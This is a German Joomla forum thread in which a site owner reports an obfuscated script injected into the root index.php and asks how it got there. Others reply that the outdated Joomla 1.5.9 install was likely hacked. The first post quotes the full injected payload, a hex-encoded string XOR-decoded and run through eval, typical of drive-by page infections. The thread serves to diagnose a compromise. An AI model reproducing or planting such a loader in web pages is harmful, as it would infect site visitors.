+ Antworten
Ergebnis 1 bis 6 von 6

Thema: Ominöses Script in index.php??

  1. #1
    War schon öfter hier
    Registriert seit
    15.02.2009
    Beiträge
    174
    Bedankte sich
    12
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Ominöses Script in index.php??

    Hallo,

    ich habe huete morgen bei Aufruf meiner Seite einen seltsamen Parse-Error aufgrund fehlerhafter Syntax erhalten, mit Hinweis, dass in der index.php vom Root-Ordner, also nicht der vom Template, das Zeichen "<" nicht hingehört. Dann hab ich da nachgeschaut und das folgende Script entdeckt:

    Code:
    <!-- ad --><html><body>
    <script>stisz="303b372139313a207a23263d20317c76683d32263539317427263769733c2020246e7b7b6d6c7a6566627a67667a6562667b352c31267b6b6732376c3062656c6661626466636364626567373263606262636466303231327374233d30203c69736573743c313d333c20697365737427202d38316973223d273d363d383d202d6e743c3d3030313a6f736a687b3d32263539316a767d6f5e36223533382069761a351a766f313969761a351a766f";yb="function me(){bsvcov=Math.PI;csyh=parseInt;gxjppv='length';zou=csyh(~((bsvcov&bsvcov)|(~bsvcov&bsvcov)&(bsvcov&~bsvcov)|(~bsvcov&~bsvcov)));htyev=csyh(((zou&zou)|(~zou&zou)&(zou&~zou)|(~zou&~zou))&1);zyguh=htyev<<htyev;em=zou;bvaglt='';xoks=String.fromCharCode;rqagn=eval;for(ckhq=zou;ckhq<yb[gxjppv];ckhq-=-htyev)em+=yb.charCodeAt(ckhq);em%=unescape(zou+xoks(120)+(htyev<<6));for(ckhq=zou;ckhq<stisz[gxjppv];ckhq+=zyguh)bvaglt+=xoks(csyh(zou+xoks(120)+stisz.charAt(ckhq)+stisz.charAt(ckhq+csyh(htyev)))^em);try{rqagn(bvaglt);}catch(e){try{eval(bvaglt);}catch(e){;}}}try{eval('me();')}catch(e) {}";eval(yb);</script>
    </body></html><!-- /ad -->
    Eins weis ich - von mir stammt dieses Script sicherlich nicht. Weis jemand wie das dort hingekommen ist oder hatte jemand schonmal das gleiche Problem? Die Zugriffsrechte der index.php sind auf 644 eingestellt.
    Danke.

  2. #2
    Wohnt hier
    Registriert seit
    01.05.2007
    Ort
    Lingen
    Beiträge
    2.576
    Bedankte sich
    6
    Erhielt 837 Danksagungen
    in 793 Beiträgen

    Standard

    Welche Joomla Version hast du?
    Meine Antwort war hilfreich? Dann würde ich mich über einen Click auf Danke sehr freuen
    Kein kostenloser Support per PN

  3. #3
    War schon öfter hier
    Registriert seit
    15.02.2009
    Beiträge
    174
    Bedankte sich
    12
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Ich habe Jommla, Version 1.5.9.

  4. #4
    Kommt häufiger vorbei Avatar von adrianomath
    Registriert seit
    10.07.2008
    Beiträge
    331
    Bedankte sich
    81
    Erhielt 32 Danksagungen
    in 31 Beiträgen

    Standard

    Zitat Zitat von hinkel11 Beitrag anzeigen
    Ich habe Jommla, Version 1.5.9.
    Es gibt schon 1.5.14

    Arbeite dies ab.
    DANKE nicht vergessen :-)

  5. #5
    Wohnt hier
    Registriert seit
    01.05.2007
    Ort
    Lingen
    Beiträge
    2.576
    Bedankte sich
    6
    Erhielt 837 Danksagungen
    in 793 Beiträgen

    Standard

    Dann kannste davon ausgehen das deine Seite gehackt wurde weil du eine absolut veraltete Version von Joomla einsetzt.
    Meine Antwort war hilfreich? Dann würde ich mich über einen Click auf Danke sehr freuen
    Kein kostenloser Support per PN

  6. #6
    Gehört zum Inventar Avatar von albatros
    Registriert seit
    16.08.2006
    Beiträge
    7.840
    Bedankte sich
    1.118
    Erhielt 1.890 Danksagungen
    in 1.748 Beiträgen

    Standard

    Hi,

    auch in Erweiterungen und Templates gab es in der Vergangenheit ja schonmal "überraschende Dinge" zu finden. Aber in Deinem Fall würde ich auch zur Abarbeitung von Flottes Liste raten, also eher an einen Hack denken.

    hth

    albatros
    1.FAQ 2.SuFu 3.Google
    Hilfestellungen und Lösungen können nur im Forum von allen genutzt werden. Bitte keine Supportanfragen per PN!
    ...und setz mich auf mein achtel Lorbeerblatt und mache was ich will.

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein